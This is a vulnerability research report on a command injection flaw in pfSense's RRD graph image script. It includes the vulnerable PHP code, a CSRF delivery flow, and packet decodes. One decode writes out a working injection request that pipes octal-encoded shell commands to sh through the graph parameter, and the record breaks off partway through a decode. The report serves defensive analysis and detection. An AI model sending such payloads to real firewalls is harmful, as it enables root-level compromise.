Vulnerability Report (ESF PfSense Status - RRD - Graph - Img - PHP Command Injection)

TELUS Security Labs
Vulnerability Research Service
ESF pfSense status_rrd_graph_img.php Command Injection

Vulnerability Report - TSL20160419-04
Revision 1.0
Revision History
Revision 1.0 2016-05-02
Copyright 2004-2012 TELUS Security Labs
PROPRIETARY AND CONFIDENTIAL

ESF pfSense status_rrd_graph_img.php Command Injection Revision 1.0
Table of Contents
1. Identity of Problem ................................................................................................................................ 3
1.1. Brief Description ......................................................................................................................... 3
1.2. CVE Reference .......................................................................................................................... 3
1.3. OSVDB Reference ..................................................................................................................... 3
1.4. Vendor Advisory ......................................................................................................................... 3
1.5. Discoverer Advisory .................................................................................................................... 3
1.6. Other Advisories ......................................................................................................................... 3
1.7. Notes ......................................................................................................................................... 3
1.8. Vulnerability Classification and Severity ....................................................................................... 3
2. Affected Products .................................................................................................................................. 5
2.1. Products Directly Affected by the Vulnerability .............................................................................. 5
2.2. Other Products Embedding the Vulnerable Product ...................................................................... 5
3. Problem Location .................................................................................................................................. 6
3.1. Program ..................................................................................................................................... 6
3.2. Function or Method .................................................................................................................... 6
3.3. Parameters ................................................................................................................................ 6
3.4. Data Objects .............................................................................................................................. 6
4. Problem Mechanism .............................................................................................................................. 7
4.1. Technical Mechanism ................................................................................................................. 7
4.2. Source Code Walkthrough .......................................................................................................... 7
4.3. Open Questions to Resolve ........................................................................................................ 8
5. Triggering the Problem .......................................................................................................................... 9
5.1. Prerequisites .............................................................................................................................. 9
5.2. Triggering Conditions .................................................................................................................. 9
5.3. Protocol Flow Diagram ............................................................................................................... 9
5.4. Attack Delivery ........................................................................................................................... 9
5.5. Packet Decodes ......................................................................................................................... 9
6. Attack Detection .................................................................................................................................. 15
6.1. Remote Detection of Generic Attacks ........................................................................................ 15
6.2. Remote Detection of Known Exploits ......................................................................................... 15
7. Exploit Reproduction ............................................................................................................................ 17
7.1. Exploit Overview ....................................................................................................................... 17
7.2. Exploit Code ............................................................................................................................. 17
8. Public Exploits ..................................................................................................................................... 18
8.1. Public Exploit [SA] .................................................................................................................... 18
9. Remediation Details ............................................................................................................................. 19
10. Related Research .............................................................................................................................. 20
11. Credits .............................................................................................................................................. 21
TELUS Security Labs Vulnerability Research Service 2

1. Identity of Problem
1.1. Brief Description
A Command Injection vulnerability has been reported in ESF pfSense. This vulnerability is due to
status_rrd_graph_img.php incorrectly validating the graph HTTP parameter.
A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the
status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice
an authenticated user to exploit this vulnerability. Successful exploitation will result in arbitrary command execution
with root privileges.
1.2. CVE Reference

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.
1.3. OSVDB Reference

This vulnerability has not been assigned an Open Source Vulnerability Database (OSVDB) identifier.
1.4. Vendor Advisory

The vendor, ESF, has released an advisory addressing this vulnerability with the unique identifier pfSense-
SA-16_01, dated 2016-04-01.
Reference: https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc
1.5. Discoverer Advisory

The discoverer, Francesco Oddo, has released an advisory addressing this vulnerability, dated 2016-04-15.
Reference: http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf
1.6. Other Advisories

There are no other advisories available.
1.7. Notes
Not available.
1.8. Vulnerability Classification and Severity

1.8.1. TELUS Security Labs Classification
Vulnerability impact: COMMAND EXECUTION
Vulnerability type: INPUT VALIDATION ERROR
1.8.2. Common Weakness Enumeration (CWE) Classification

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Reference: https://cwe.mitre.org/data/definitions/78.html

1.8.3. Severity
The severity classification of this vulnerability is high. This rating was determined through consideration of the
following factors:
Exploit code is publicly available.
This is a server compromise.
The vulnerability, if exploited, can lead to a root or system-level compromise.
The software affected by this vulnerability is significantly deployed.
The assets affected by this vulnerability are estimated to be of high value.
The attacker must have limited user privileges.
1.8.4. Common Vulnerability Scoring System (CVSS)

Base score is 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C), based on the following metrics:
Access vector is network.
Access complexity is medium.
Level of authentication required is single.
Impact of this vulnerability on data confidentiality is complete.
Impact of this vulnerability on data integrity is complete.
Impact of this vulnerability on data availability is complete.
Temporal score is 7.0 (E:F/RL:OF/RC:C), based on the following metrics:
The exploitability level of this vulnerability is functional.
The remediation level of this vulnerability is official fix.
The report confidence level of this vulnerability is confirmed.

2. Affected Products
2.1. Products Directly Affected by the Vulnerability
Electric Sheep Fencing pfSense prior to 2.3
2.2. Other Products Embedding the Vulnerable Product

Not applicable.

3. Problem Location
3.1. Program
This vulnerable program is status_rrd_graph_img.php
3.2. Function or Method

The vulnerable function is responsible for sanitizing special characters used in Shell commands.
3.3. Parameters
The vulnerable parameter is the HTTP parameter graph.
3.4. Data Objects

Not available.

4. Problem Mechanism
4.1. Technical Mechanism
pfSense is a open source network firewall distribution based on the FreeBSD operating system. The distribution
creates a simple and intuitive WebGUI for configuring and managing a network firewall. Configuration is managed
either through the CLI or a web interface called the webConfigurator. The webConfigurator is a web application
capable of configuring and managing the firewall as well as other components of the pfSense distribution. All
interaction with the interface is performed via the HTTP protocol over port 80/TCP or securely over 443/TCP.
HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client
to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various
headers, an empty line, and an optional message body:
Request = Request-Line headers CRLF [message-body]
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Headers = *[Header]
Header = Field-Name ":" Field-Value CRLF
where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents
a space character. Parameters can be passed from the client to the server as name-value pairs in either the
Request-URI, or in the message-body, depending on the Method used and Content-Type header. For example, a
simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like:
GET /my_webapp/mypaget.htm?param=1 HTTP/1.1
Host: www.myhost.com
A corresponding HTTP request using the POST method might look like:
POST /my_webapp/mypaget.htm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
param=1
If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:
var1=value1&var2=value2...
A command injection vulnerability exists in ESF pfSense. This vulnerability is due to status_rrd_graph_img.php
incorrectly sanitizing the graph HTTP parameter. Specifically, this PHP script fails to check for the pipe
"|" (ASCII:0x7C) and grave accent "`" (ASCII:0x60) characters. The graph parameter is then used to construct a
Shell command which is executed using the exec() function enabling less privileged users to inject arbitrary OS
commands.
A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the
status_rrd_graph_img.php URI. Remote unauthenticated attackers can leverage a CSRF vulnerability and entice
an authenticated user to exploit this vulnerability. Successful exploitation will result in arbitrary command execution
with root privileges.
4.2. Source Code Walkthrough

The following code snippet was taken from status_rrd_graph_img.php version 2.2.6. Comments added by TELUS
Security Labs have been highlighted.
$pgtitle = array(gettext("System"),gettext("RRD Graphs"),gettext("Image viewer"));
if ($_GET['database']) { //this param not exploitable due to future checks

$curdatabase = basename($_GET['database']);
$curdatabase = str_replace(array("<", ">", ";", "&", "'", '"'), "",

htmlspecialchars_decode($curdatabase, ENT_QUOTES | ENT_HTML401));

} else {
$curdatabase = "wan-traffic.rrd";
}
if ($_GET['style']) {
$curstyle = $_GET['style'];
} else {
$curstyle = "inverse";
}
/* this is used for temp name */

if ($_GET['graph']) { //no check for "|" or "`"
$curgraph = str_replace(array("<", ">", ";", "&", "'", '"', '.', '/'), "",
htmlspecialchars_decode($_GET['graph'], ENT_QUOTES | ENT_HTML401));
} else {
$curgraph = "custom";
}
[...Truncated for readability...]
//vulnerable exec() below

//$curgraph is used to generate $graphcmd
if (file_exists("$rrdtmppath$curdatabase-$curgraph.png")) {
if ((time() - filemtime("$rrdtmppath$curdatabase-$curgraph.png")) >= 15 ) {
if ($data) {
$_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
$graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
flush();
usleep(500);
}
}
} else {
if ($data) {
$_gb = exec("$graphcmd 2>&1", $graphcmdoutput, $graphcmdreturn);
$graphcmdoutput = implode(" ", $graphcmdoutput) . $graphcmd;
flush();
usleep(500);
}
}
4.3. Open Questions to Resolve

Not available.

5. Triggering the Problem

5.1. Prerequisites
The server must have the vulnerable product installed and running.
The attacker must be able to entice a user to visit a malicious website.
5.2. Triggering Conditions

The attacker entices a user to send a HTTP request containing malicious shell commands in the affected parameter
to the affected parameter. The vulnerability is triggered when the server processes this request.
5.3. Protocol Flow Diagram

5.3.1. Request/responses sequences, static or negotiated/ephemeral ports, etc
An authenticated target user is enticed to click on a hyperlink:
[ Attacker ] -----------------> [ Target User ]
The target user sends the crafted HTTP request to the target server:
[ Target User ] -----------------> [ Target Server ]
5.4. Attack Delivery

5.4.1. Application protocols
The following application protocols can be used to deliver an attack that exploits this vulnerability:
HTTP, over port 80/TCP

HTTPS, over port 80/TCP
5.4.2. IP protocols
Not available.
5.4.3. File based vectors

Not available.
5.4.4. Notes
Not applicable.
5.5. Packet Decodes

5.5.1. Normal traffic (baseline)
The following packet decode illustrates a normal packet exchange. Please refer to the attached file normal.pcap
for details.
A client sends a request:

Frame 4: 492 bytes on wire (3936 bits), 492 bytes captured (3936 bits)

Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60)

Internet Protocol Version 4, Src: 172.16.8.206 (172.16.8.206), Dst: 172.16.8.192 (172.16.8.192)
Transmission Control Protocol, Src Port: 49344 (49344), Dst Port: http (80), Seq: 1, Ack: 1, Len: 438
Hypertext Transfer Protocol
GET /status_rrd_graph_img.php HTTP/1.1\r\n
Host: 172.16.8.192\r\n
Connection: keep-alive\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75
Safari/537.36\r\n
Accept-Encoding: gzip, deflate, sdch\r\n
Accept-Language: en-US,en;q=0.8\r\n
Cookie: PHPSESSID=35edee32158c1a2a39b76b97ca8eaaa6\r\n
\r\n
0000 00 50 56 bd 7f 60 00 50 56 bd e4 13 08 00 45 00 .PV..`.PV.....E.
0010 01 de 0e 5a 40 00 80 06 81 11 ac 10 08 ce ac 10 ...Z@...........
0020 08 c0 c0 c0 00 50 90 2b b3 5b fa 4d 4d 1a 50 18 .....P.+.[.MM.P.
0030 fa f0 f7 3c 00 00 47 45 54 20 2f 73 74 61 74 75 ...<..GET /statu
0040 73 5f 72 72 64 5f 67 72 61 70 68 5f 69 6d 67 2e s_rrd_graph_img.
0050 70 68 70 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f php HTTP/1.1..Ho
0060 73 74 3a 20 31 37 32 2e 31 36 2e 38 2e 31 39 32 st: 172.16.8.192
0070 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 ..Connection: ke
0080 65 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 74 ep-alive..Accept
0090 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c : text/html,appl
00a0 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d ication/xhtml+xm
00b0 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d l,application/xm
00c0 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 65 2f 77 65 l;q=0.9,image/we
00d0 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 55 70 bp,*/*;q=0.8..Up
00e0 67 72 61 64 65 2d 49 6e 73 65 63 75 72 65 2d 52 grade-Insecure-R
00f0 65 71 75 65 73 74 73 3a 20 31 0d 0a 55 73 65 72 equests: 1..User
0100 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f -Agent: Mozilla/
0110 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 5.0 (Windows NT
0120 36 2e 31 29 20 41 70 70 6c 65 57 65 62 4b 69 74 6.1) AppleWebKit
0130 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 /537.36 (KHTML,
0140 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f like Gecko) Chro
0150 6d 65 2f 35 30 2e 30 2e 32 36 36 31 2e 37 35 20 me/50.0.2661.75
0160 53 61 66 61 72 69 2f 35 33 37 2e 33 36 0d 0a 41 Safari/537.36..A
0170 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 ccept-Encoding:
0180 67 7a 69 70 2c 20 64 65 66 6c 61 74 65 2c 20 73 gzip, deflate, s
0190 64 63 68 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 dch..Accept-Lang
01a0 75 61 67 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 uage: en-US,en;q
01b0 3d 30 2e 38 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 =0.8..Cookie: PH
01c0 50 53 45 53 53 49 44 3d 33 35 65 64 65 65 33 32 PSESSID=35edee32
01d0 31 35 38 63 31 61 32 61 33 39 62 37 36 62 39 37 158c1a2a39b76b97
01e0 63 61 38 65 61 61 61 36 0d 0a 0d 0a ca8eaaa6....
The server responds:
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
Transmission Control Protocol, Src Port: http (80), Dst Port: 49344 (49344), Seq: 1, Ack: 439, Len: 1460
HTTP/1.1 200 OK\r\n
Expires: Sat, 30 Apr 2016 20:31:34 GMT\r\n
Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
Cache-Control: max-age=180000\r\n
Cache-Control: no-store, no-cache, must-revalidate\r\n
Cache-Control: post-check=0, pre-check=0\r\n
X-Frame-Options: SAMEORIGIN\r\n
Content-type: image/png\r\n
Last-Modified: Thu, 28 Apr 2016 18:31:35 GMT\r\n
Pragma: no-cache\r\n
Transfer-Encoding: chunked\r\n
Date: Thu, 28 Apr 2016 18:31:35 GMT\r\n
Server: lighttpd/1.4.38\r\n
\r\n
HTTP chunked response
0000 00 50 56 bd e4 13 00 50 56 bd 7f 60 08 00 45 00 .PV....PV..`..E.
0010 05 dc 46 7f 40 00 40 06 84 ee ac 10 08 c0 ac 10 ..F.@.@.........
0020 08 ce 00 50 c0 c0 fa 4d 4d 1a 90 2b b5 11 50 10 ...P...MM..+..P.
0030 ff ff 48 d5 00 00 48 54 54 50 2f 31 2e 31 20 32 ..H...HTTP/1.1 2

0040 30 30 20 4f 4b 0d 0a 45 78 70 69 72 65 73 3a 20 00 OK..Expires:
0050 53 61 74 2c 20 33 30 20 41 70 72 20 32 30 31 36 Sat, 30 Apr 2016
0060 20 32 30 3a 33 31 3a 33 34 20 47 4d 54 0d 0a 45 20:31:34 GMT..E
0070 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 xpires: Mon, 26
0080 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 Jul 1997 05:00:0
0090 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 0 GMT..Cache-Con
00a0 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 trol: max-age=18
00b0 30 30 30 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 0000..Cache-Cont
00c0 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e rol: no-store, n
00d0 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 o-cache, must-re
00e0 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d validate..Cache-
00f0 43 6f 6e 74 72 6f 6c 3a 20 70 6f 73 74 2d 63 68 Control: post-ch
0100 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b eck=0, pre-check
0110 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 =0..X-Frame-Opti
0120 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d ons: SAMEORIGIN.
0130 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 69 .Content-type: i
0140 6d 61 67 65 2f 70 6e 67 0d 0a 4c 61 73 74 2d 4d mage/png..Last-M
0150 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 38 odified: Thu, 28
0160 20 41 70 72 20 32 30 31 36 20 31 38 3a 33 31 3a Apr 2016 18:31:
0170 33 35 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 35 GMT..Pragma:
0180 6e 6f 2d 63 61 63 68 65 0d 0a 54 72 61 6e 73 66 no-cache..Transf
0190 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 er-Encoding: chu
01a0 6e 6b 65 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c nked..Date: Thu,
01b0 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 3a 28 Apr 2016 18:
01c0 33 31 3a 33 35 20 47 4d 54 0d 0a 53 65 72 76 65 31:35 GMT..Serve
01d0 72 3a 20 6c 69 67 68 74 74 70 64 2f 31 2e 34 2e r: lighttpd/1.4.
05c0 23 cc a2 45 8b 1a ea 4b c3 b8 dd e3 a9 6a bf aa #..E...K.....j..
05d0 dc c7 54 52 7a cc 98 31 e6 73 9f fb 9c 79 fa e9 ..TRz..1.s...y..
05e0 a7 33 ff 84 18 d7 c8 6f 66 9c .3.....of.
5.5.2. Attack cases

The following packet decode illustrates an attack packet exchange. Please refer to the attached file attack.pcap
for details.
A client is enticed to visit a malicious website:
Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d)
GET /~ssivakumaran/pfsense/poc.html HTTP/1.1\r\n
Host: 172.16.1.2\r\n
Safari/537.36\r\n
\r\n
0000 a0 d3 c1 f1 4a 7d 00 50 56 bd e4 13 08 00 45 00 ....J}.PV.....E.
0010 01 ae 11 45 40 00 80 06 86 14 ac 10 08 ce ac 10 ...E@...........
0020 01 02 c0 cf 00 50 d8 27 1e 87 d5 9a 57 c2 50 18 .....P.'....W.P.
0030 01 00 5e 3c 00 00 47 45 54 20 2f 7e 73 73 69 76 ..^<..GET /~ssiv
0040 61 6b 75 6d 61 72 61 6e 2f 70 66 73 65 6e 73 65 akumaran/pfsense
0050 2f 70 6f 63 2e 68 74 6d 6c 20 48 54 54 50 2f 31 /poc.html HTTP/1
0060 2e 31 0d 0a 48 6f 73 74 3a 20 31 37 32 2e 31 36 .1..Host: 172.16
0070 2e 31 2e 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e .1.2..Connection
0080 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 41 63 : keep-alive..Ac
0090 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c cept: text/html,
00a0 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d application/xhtm
00b0 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f l+xml,applicatio
00c0 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 n/xml;q=0.9,imag
00d0 65 2f 77 65 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 e/webp,*/*;q=0.8
00e0 0d 0a 55 70 67 72 61 64 65 2d 49 6e 73 65 63 75 ..Upgrade-Insecu
00f0 72 65 2d 52 65 71 75 65 73 74 73 3a 20 31 0d 0a re-Requests: 1..
0100 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0110 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 lla/5.0 (Windows
0120 20 4e 54 20 36 2e 31 29 20 41 70 70 6c 65 57 65 NT 6.1) AppleWe
0130 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 bKit/537.36 (KHT

0140 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 ML, like Gecko)

0150 43 68 72 6f 6d 65 2f 35 30 2e 30 2e 32 36 36 31 Chrome/50.0.2661
0160 2e 37 35 20 53 61 66 61 72 69 2f 35 33 37 2e 33 .75 Safari/537.3
0170 36 0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6..Accept-Encodi
0180 6e 67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 ng: gzip, deflat
0190 65 2c 20 73 64 63 68 0d 0a 41 63 63 65 70 74 2d e, sdch..Accept-
01a0 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 53 2c Language: en-US,
01b0 65 6e 3b 71 3d 30 2e 38 0d 0a 0d 0a en;q=0.8....
Malicious server responds:

Ethernet II, Src: HewlettP_f1:4a:7d (a0:d3:c1:f1:4a:7d), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
HTTP/1.1 200 OK\r\n
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips PHP/5.4.16 mod_wsgi/3.4 Python/2.7.5\r\n
ETag: "133-5318fbb6ba130"\r\n
Accept-Ranges: bytes\r\n
Content-Length: 307\r\n
Keep-Alive: timeout=5, max=100\r\n
Connection: Keep-Alive\r\n
Content-Type: text/html; charset=UTF-8\r\n
\r\n
Line-based text data: text/html
<html>\n
</html>\n
0000 00 50 56 bd e4 13 a0 d3 c1 f1 4a 7d 08 00 45 00 .PV.......J}..E.
0010 02 bf 01 69 40 00 40 06 d4 df ac 10 01 02 ac 10 ...i@.@.........
0020 08 ce 00 50 c0 cf d5 9a 57 c2 d8 27 20 0d 50 18 ...P....W..' .P.
0030 00 7b 93 ab 00 00 48 54 54 50 2f 31 2e 31 20 32 .{....HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 00 OK..Date: Thu
0050 2c 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 , 28 Apr 2016 18
0060 3a 34 37 3a 31 32 20 47 4d 54 0d 0a 53 65 72 76 :47:12 GMT..Serv
0070 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 er: Apache/2.4.6
0080 20 28 43 65 6e 74 4f 53 29 20 4f 70 65 6e 53 53 (CentOS) OpenSS
0090 4c 2f 31 2e 30 2e 31 65 2d 66 69 70 73 20 50 48 L/1.0.1e-fips PH
00a0 50 2f 35 2e 34 2e 31 36 20 6d 6f 64 5f 77 73 67 P/5.4.16 mod_wsg
00b0 69 2f 33 2e 34 20 50 79 74 68 6f 6e 2f 32 2e 37 i/3.4 Python/2.7
00c0 2e 35 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 .5..Last-Modifie
00d0 64 3a 20 54 68 75 2c 20 32 38 20 41 70 72 20 32 d: Thu, 28 Apr 2
00e0 30 31 36 20 31 38 3a 33 31 3a 31 38 20 47 4d 54 016 18:31:18 GMT
00f0 0d 0a 45 54 61 67 3a 20 22 31 33 33 2d 35 33 31 ..ETag: "133-531
0100 38 66 62 62 36 62 61 31 33 30 22 0d 0a 41 63 63 8fbb6ba130"..Acc
0110 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 ept-Ranges: byte
0120 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 s..Content-Lengt
0130 68 3a 20 33 30 37 0d 0a 4b 65 65 70 2d 41 6c 69 h: 307..Keep-Ali
0140 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d ve: timeout=5, m
0150 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 ax=100..Connecti
0160 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a on: Keep-Alive..
0170 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 Content-Type: te
0180 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 xt/html; charset
0190 3d 55 54 46 2d 38 0d 0a 0d 0a 3c 68 74 6d 6c 3e =UTF-8....<html>
01a0 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 . <head>. <t
01b0 69 74 6c 65 3e 54 45 4c 55 53 20 53 65 63 75 72 itle>TELUS Secur
01c0 69 74 79 20 4c 61 62 73 20 50 6f 43 3c 2f 74 69 ity Labs PoC</ti
01d0 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 tle>. </head>.
02a0 68 6f 22 3e 43 6c 69 63 6b 20 68 65 72 65 20 66 ho">Click here f
02b0 6f 72 20 50 6f 43 3c 2f 61 3e 0a 20 20 3c 2f 62 or PoC</a>. </b
02c0 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a ody>.</html>.
The client sends a crafted request to the server:

Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60)
GET
/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\164\\157\\165
\\143\\150\\040\\057\\164\\155\\160\\057\\164\\145\\163\\164|sh|echo

HTTP/1.1\r\n
Host: 172.16.8.192\r\n
Safari/537.36\r\n
Referer: http://172.16.1.2/~ssivakumaran/pfsense/poc.html\r\n
Cookie: PHPSESSID=9ef619062013b1690743c6265f32a760\r\n
\r\n
0000 00 50 56 bd 7f 60 00 50 56 bd e4 13 08 00 45 00 .PV..`.PV.....E.
0010 02 9a 11 4c 40 00 80 06 7d 63 ac 10 08 ce ac 10 ...L@...}c......
0020 08 c0 c0 d0 00 50 b4 59 66 5b 16 f6 a6 e9 50 18 .....P.Yf[....P.
0030 01 00 3b 44 00 00 47 45 54 20 2f 73 74 61 74 75 ..;D..GET /statu
0040 73 5f 72 72 64 5f 67 72 61 70 68 5f 69 6d 67 2e s_rrd_graph_img.
0050 70 68 70 3f 64 61 74 61 62 61 73 65 3d 2d 74 68 php?database=-th
0060 72 6f 75 67 68 70 75 74 2e 72 72 64 26 67 72 61 roughput.rrd&gra
0070 70 68 3d 66 69 6c 65 7c 70 72 69 6e 74 66 25 32 ph=file|printf%2 << suspicious content
0080 30 5c 5c 31 36 34 5c 5c 31 35 37 5c 5c 31 36 35 0\\164\\157\\165
0090 5c 5c 31 34 33 5c 5c 31 35 30 5c 5c 30 34 30 5c \\143\\150\\040\
00a0 5c 30 35 37 5c 5c 31 36 34 5c 5c 31 35 35 5c 5c \057\\164\\155\\
00b0 31 36 30 5c 5c 30 35 37 5c 5c 31 36 34 5c 5c 31 160\\057\\164\\1
00c0 34 35 5c 5c 31 36 33 5c 5c 31 36 34 7c 73 68 7c 45\\163\\164|sh|
00d0 65 63 68 6f 20 48 54 54 50 2f 31 2e 31 0d 0a 48 echo HTTP/1.1..H
00e0 6f 73 74 3a 20 31 37 32 2e 31 36 2e 38 2e 31 39 ost: 172.16.8.19
00f0 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 2..Connection: k
0100 65 65 70 2d 61 6c 69 76 65 0d 0a 41 63 63 65 70 eep-alive..Accep
0110 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 t: text/html,app
0120 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 lication/xhtml+x
0130 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 ml,application/x
0140 6d 6c 3b 71 3d 30 2e 39 2c 69 6d 61 67 65 2f 77 ml;q=0.9,image/w
0150 65 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 55 ebp,*/*;q=0.8..U
0160 70 67 72 61 64 65 2d 49 6e 73 65 63 75 72 65 2d pgrade-Insecure-
0170 52 65 71 75 65 73 74 73 3a 20 31 0d 0a 55 73 65 Requests: 1..Use
0180 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 r-Agent: Mozilla
0190 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 /5.0 (Windows NT
01a0 20 36 2e 31 29 20 41 70 70 6c 65 57 65 62 4b 69 6.1) AppleWebKi
01b0 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c t/537.36 (KHTML,
01c0 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 like Gecko) Chr
01d0 6f 6d 65 2f 35 30 2e 30 2e 32 36 36 31 2e 37 35 ome/50.0.2661.75
0280 53 49 44 3d 39 65 66 36 31 39 30 36 32 30 31 33 SID=9ef619062013
0290 62 31 36 39 30 37 34 33 63 36 32 36 35 66 33 32 b1690743c6265f32
02a0 61 37 36 30 0d 0a 0d 0a a760....
The server responds:
Ethernet II, Src: Vmware_bd:7f:60 (00:50:56:bd:7f:60), Dst: Vmware_bd:e4:13 (00:50:56:bd:e4:13)
HTTP/1.1 200 OK\r\n
Expires: Sat, 30 Apr 2016 20:48:52 GMT\r\n
Expires: Mon, 26 Jul 1997 05:00:00 GMT\r\n
Cache-Control: max-age=180000\r\n
Cache-Control: no-store, no-cache, must-revalidate\r\n
Cache-Control: post-check=0, pre-check=0\r\n
X-Frame-Options: SAMEORIGIN\r\n
Content-type: image/png\r\n
Pragma: no-cache\r\n
Transfer-Encoding: chunked\r\n
Server: lighttpd/1.4.38\r\n
\r\n
HTTP chunked response
Media Type
Media Type: image/png (175 bytes)
Frame (667 bytes):

0000 00 50 56 bd e4 13 00 50 56 bd 7f 60 08 00 45 00 .PV....PV..`..E.
0010 02 8d 61 92 40 00 40 06 6d 2a ac 10 08 c0 ac 10 ..a.@.@.m*......

